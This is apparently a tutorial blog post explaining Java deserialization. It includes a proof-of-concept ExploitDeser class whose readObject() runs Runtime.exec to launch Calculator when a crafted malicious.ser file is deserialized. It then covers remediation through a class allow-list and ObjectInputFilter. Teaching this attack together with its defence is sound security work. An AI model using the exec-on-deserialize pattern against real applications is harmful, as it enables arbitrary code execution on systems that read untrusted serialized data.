Understanding Java De-serialization

Swapneil Kumar Dash
Sep 23 · 8 min read

So, What is Deserialization?

Demo Time

public class Employee implements java.io.Serializable {
    public String name;
    public String address;
    public transient int SSN;   // transient: never written to the stream, so it reads back as 0
    public int number;

    public void mailCheck() {
        System.out.println("Mailing a check to " + name + " " + address);
    }
}
import java.io.*;

public class SerializeDemo {
    public static void main(String[] args) {
        Employee e = new Employee();
        e.name = "Reyan Ali";
        e.address = "Phokka Kuan, Ambehta Peer";
        e.SSN = 11122333;
        e.number = 101;
        try {
            FileOutputStream fileOut = new FileOutputStream("/tmp/employee.ser");
            ObjectOutputStream out = new ObjectOutputStream(fileOut);
            out.writeObject(e); // Serialization done here
            out.close();
            fileOut.close();
            System.out.printf("Serialized data is saved in /tmp/employee.ser");
        } catch (IOException i) {
            i.printStackTrace();
        }
    }
}
Serialization code gets executed
Content of employee.ser
Base64 serialized data
import java.io.*;

public class DeserializeDemo {
    public static void main(String[] args) {
        Employee e = null;
        try {
            FileInputStream fileIn = new FileInputStream("/tmp/employee.ser");
            ObjectInputStream in = new ObjectInputStream(fileIn);
            e = (Employee) in.readObject(); // Deserialization done here
            in.close();
            fileIn.close();
        } catch (IOException i) {
            i.printStackTrace();
            return;
        } catch (ClassNotFoundException c) {
            System.out.println("Employee class not found");
            c.printStackTrace();
            return;
        }
        e.mailCheck();
        System.out.println("Deserialized Employee...");
        System.out.println("Name: " + e.name);
        System.out.println("Address: " + e.address);
        System.out.println("SSN: " + e.SSN);
        System.out.println("Number: " + e.number);
    }
}
e = (Employee) in.readObject();
Deserialization code gets executed
import java.io.IOException;

public class ExploitDeser implements java.io.Serializable {
    // readObject() is invoked by ObjectInputStream while the stream is still being read,
    // i.e. before the caller's cast to Employee is ever reached
    private void readObject(java.io.ObjectInputStream in)
            throws IOException, ClassNotFoundException {
        in.defaultReadObject();
        Runtime.getRuntime().exec("/Applications/Calculator.app/Contents/MacOS/Calculator");
    }
}
import java.io.*;

public class SerializeDemo {
    public static void main(String[] args) {
        ExploitDeser e = new ExploitDeser();
        try {
            FileOutputStream fileOut = new FileOutputStream("/tmp/malicious.ser");
            ObjectOutputStream out = new ObjectOutputStream(fileOut);
            out.writeObject(e);
            out.close();
            fileOut.close();
            System.out.printf("Serialized data is saved in /tmp/malicious.ser");
        } catch (IOException i) {
            i.printStackTrace();
        }
    }
}
Provided malicious.ser as input to the DeserializeDemo class
Calculator Pops up

Remediation

import java.io.*;

class LookAheadObjectInputStream extends ObjectInputStream {
    public LookAheadObjectInputStream(InputStream inputStream) throws IOException {
        super(inputStream);
    }

    // resolveClass() is called for every class descriptor in the stream before the
    // class is loaded or instantiated, so an unexpected class is rejected before
    // its readObject() can run
    @Override
    protected Class<?> resolveClass(ObjectStreamClass desc)
            throws IOException, ClassNotFoundException {
        if (!desc.getName().equals(Employee.class.getName())) {
            throw new InvalidClassException("Unauthorized deserialization attempt", desc.getName());
        }
        return super.resolveClass(desc);
    }
}
if (!desc.getName().equals(Employee.class.getName())) {
Modified DeserializeDemo class
Error in execution of serialized data of custom class
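The same allow-list idea can be expressed with the JDK's built-in deserialization filter (java.io.ObjectInputFilter, available since Java 9 / JEP 290) instead of subclassing ObjectInputStream. The following is an added example and not code from the original post; it assumes the post's Employee class is on the classpath in the default package, and the class name FilteredDeserializeDemo and the helper load() are my own.

```java
import java.io.*;

// Added example, not code from the original post: DeserializeDemo hardened with
// the JDK's built-in deserialization filter (java.io.ObjectInputFilter, Java 9+).
// Assumes the post's Employee class is on the classpath in the default package.
public class FilteredDeserializeDemo {

    // Allow-list: only the class named "Employee" may be deserialized; the trailing
    // "!*" rejects every other class. maxdepth/maxrefs cap the object graph so a
    // hostile stream cannot exhaust stack or memory. Strings and primitives are
    // not subject to class filtering, so Employee's String fields still load.
    static final ObjectInputFilter EMPLOYEE_ONLY =
            ObjectInputFilter.Config.createFilter("Employee;maxdepth=5;maxrefs=50;!*");

    static Employee load(String path) throws IOException, ClassNotFoundException {
        try (ObjectInputStream in = new ObjectInputStream(new FileInputStream(path))) {
            // The filter is consulted for each class descriptor as the stream is read,
            // before the class is instantiated, so a rejected class never gets to run
            // its readObject(). It must be set before the first readObject() call.
            in.setObjectInputFilter(EMPLOYEE_ONLY);
            return (Employee) in.readObject();
        }
    }

    public static void main(String[] args) {
        String path = args.length > 0 ? args[0] : "/tmp/employee.ser";
        try {
            Employee e = load(path);
            e.mailCheck();
            System.out.println("Name: " + e.name);
            System.out.println("Number: " + e.number);
            System.out.println("SSN: " + e.SSN);   // transient field: prints 0
        } catch (InvalidClassException ice) {
            // A filter rejection surfaces as InvalidClassException("filter status: REJECTED")
            System.out.println("Rejected by deserialization filter: " + ice.getMessage());
        } catch (IOException | ClassNotFoundException ex) {
            ex.printStackTrace();
        }
    }
}
```

Run with /tmp/employee.ser and the Employee is printed as in the original demo; run with /tmp/malicious.ser and the stream is rejected with an InvalidClassException before ExploitDeser is ever instantiated, so its readObject() does not execute. The same pattern can also be applied process-wide, without touching application code, through the jdk.serialFilter system property (for example -Djdk.serialFilter="Employee;!*"), which is useful when the vulnerable readObject() call sits in a library you do not control.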

References:
